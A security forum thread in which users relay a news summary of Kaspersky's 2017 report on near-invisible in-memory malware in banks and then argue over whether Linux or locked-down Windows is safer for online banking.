Gizmos Freeware Reviews  

Go Back   Gizmo's Freeware Forum > Debating Chamber > Security

Reply
 
Thread Tools Display Modes
Old 18. Jun 2015, 07:38 AM   #51 (permalink)
J_L
Co-Author, Best Free Security List
 
J_L's Avatar
 
Join Date: Dec 2008
Posts: 2,003
Default

Just don't install executables downloaded outside of your trusted websites. Use VirusTotal if necessary. Something like WOT helps a lot.

Basically, getting infected from something like a drive-by download is extremely unlikely unless you're using outdated software.
J_L is offline   Reply With Quote
Old 13. Feb 2017, 01:31 PM   #52 (permalink)
Member
 
Join Date: Jan 2013
Posts: 15
Default An infection unlike anything they’d seen before

Once again, I have bad news:

A new Kaspersky report talks about "invisible" Malware found in Banking Systems in over 40 countries.

https://securelist.com/blog/research...rise-networks/
http://news.softpedia.com/news/invis...s-512740.shtml


According to this report, at least 140 banks and other enterprises have been infected by malware that’s nearly invisible. Although this is the official number as of right now, given the difficulties involved in spotting this malware, the number could be much, much higher, Kaspersky specialists warn.

This is the same type of infection that Kaspersky found on its own corporate network a couple of years ago, an infection unlike anything they’d seen before. Duqu 2.0, as it was dubbed, was believed to be derived from Stuxnet, the sophisticated computer worm that was supposedly created by the US in collaboration with Israel to sabotage the nuclear program in Iran. Duqu 2.0 managed to remain undetected on Kaspersky’s network for at least six months.


"New attacks

Now, a similar infection is spreading like wildfire among countless companies, including many banks. These hard-to-detect infections use legitimate system admin and security tools, such as PowerShell, Metasploit, and Mimikatz to inject malware into computer memory.

Kaspersky has chosen not to name the institutions that are currently under attack for obvious reasons, but they did mention that they come from 40 different countries. The United States, France, Ecuador, Kenya and the United Kingdom are the five most affected nations.

What makes these series of attacks particularly nasty is the fact that on top of being nearly impossible to detect for long periods of time, it is unknown just who could be behind it all - whether there's a single group of individuals or numerous hacker groups. Unless someone claims the attacks, there's going to be a long wait before the security researchers and authorities figure out just who's responsible.


How does it work?

The first discovery of this particular malware took place in late 2016. Then, a bank’s security team found a copy of Meterpreter on the physical memory of a Microsoft, domain controller. The forensic analysis revealed that the Meterpreter code was downloaded and injected into memory with the help of PowerShell commands.

The Microsoft NETSH networking tool was also used by the infected machine to transport data to servers controlled by the attacker. Mimikatz was used by the attackers to obtain admin privileges necessary for such actions. To clean up the logs a bit, the PowerShell commands were hidden in the Windows registry, thus making it all difficult to track.

It seems that the method was used to collect passwords of system administrators and for the remote administration of infected host machines.

While the number of attacks is quite large, this seems to be the method used across most of them, which helped identify the extent of the situation."



With Windows in a ROM chip, something like this would never have happened.-
Wolfram is offline   Reply With Quote
Old 13. Feb 2017, 01:46 PM   #53 (permalink)
Site Manager
 
MidnightCowboy's Avatar
 
Join Date: Aug 2008
Location: South American Banana Republic, third bunch from the left
Posts: 15,390
Default

Issues like this surface from time to time and for obvious reasons will continue to do so. There are however some very simple steps users can take to avoid loss.
  • Use Linux (either installed or from a live session CD) or a specialized tool such as Tails to do your online banking.
  • Pay your bank's fraud insurance
  • Check your account regularly to comply with the insurance terms and conditions
__________________
Buy a Hoover and prove technology sucks.
MidnightCowboy is offline   Reply With Quote
Old 13. Feb 2017, 05:29 PM   #54 (permalink)
Senior Member
 
Cthulhux's Avatar
 
Join Date: Aug 2013
Posts: 271
Default

How does using Linux prevent loss?
__________________
Hi. I'm new here.
Cthulhux is offline   Reply With Quote
Old 13. Feb 2017, 06:07 PM   #55 (permalink)
Site Manager
 
MidnightCowboy's Avatar
 
Join Date: Aug 2008
Location: South American Banana Republic, third bunch from the left
Posts: 15,390
Default

Quote:
Originally Posted by Cthulhux View Post
How does using Linux prevent loss?
See here - just one example.

http://voices.washingtonpost.com/sec..._down_non.html
__________________
Buy a Hoover and prove technology sucks.
MidnightCowboy is offline   Reply With Quote
Old 13. Feb 2017, 06:16 PM   #56 (permalink)
Senior Member
 
Cthulhux's Avatar
 
Join Date: Aug 2013
Posts: 271
Default

There is no reason to not use a locked-down Windows PC for that.
__________________
Hi. I'm new here.
Cthulhux is offline   Reply With Quote
Old 13. Feb 2017, 06:39 PM   #57 (permalink)
Site Manager
 
MidnightCowboy's Avatar
 
Join Date: Aug 2008
Location: South American Banana Republic, third bunch from the left
Posts: 15,390
Default

Quote:
Originally Posted by Cthulhux View Post
There is no reason to not use a locked-down Windows PC for that.
Well Brian Krebs is one of the worlds leading experts on cybercrime. He doesn't recommend this but if you feel safe doing it then it's your money to lose and not his or mine. Not only that, 95% of Windows users do not know how to lock down their PC even if they were so inclined.
__________________
Buy a Hoover and prove technology sucks.
MidnightCowboy is offline   Reply With Quote
Old 13. Feb 2017, 06:47 PM   #58 (permalink)
Senior Member
 
Cthulhux's Avatar
 
Join Date: Aug 2013
Posts: 271
Default

I don't think that someone who recommends Ubuntu (officially disapproved by the Free Software Foundation due to a horrible history of spyware and similar atrocities) should be seen more as an "expert" than me.

So how do you explain the large Linux botnets? How do you explain that the recommended Ubuntu distribution has even more critical problems that the notorious Flash player? If you're interested in security, you should get rid of Linux and install Windows as soon as you can.

Also, I'm positive that "95% of Windows users" would be able to boot a locked-down Windows VM (e.g. VirtualBox) for their banking needs any time.
__________________
Hi. I'm new here.
Cthulhux is offline   Reply With Quote
Old 13. Feb 2017, 07:17 PM   #59 (permalink)
Site Manager
 
MidnightCowboy's Avatar
 
Join Date: Aug 2008
Location: South American Banana Republic, third bunch from the left
Posts: 15,390
Default

I think you are grabbing at straws because you, being a self proclaimed expert, must already know the answers to your own questions, and not exactly what the content of your post suggests. For example.

http://www.zdnet.com/article/linux-a...-linuxs-fault/

Also, the existence of security flaws is only a real-time vulnerability if there also exists a willingness to exploit them. It is therefore ludicrous to compare Ubuntu with Flash, but then you know this too.
__________________
Buy a Hoover and prove technology sucks.
MidnightCowboy is offline   Reply With Quote
Old 13. Feb 2017, 08:41 PM   #60 (permalink)
Senior Member
 
Cthulhux's Avatar
 
Join Date: Aug 2013
Posts: 271
Default

I was hoping you could provide a reasoning behind your implicit suggestion that Windows users should use a flawed and erroneous system like Linux for their banking needs. Turns out you can't. If a botnet is not Linux's fault, it's not Windows's fault either.
__________________
Hi. I'm new here.

Last edited by Cthulhux; 13. Feb 2017 at 08:47 PM.
Cthulhux is offline   Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off



All times are GMT +1. The time now is 10:17 AM.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2021, vBulletin Solutions, Inc.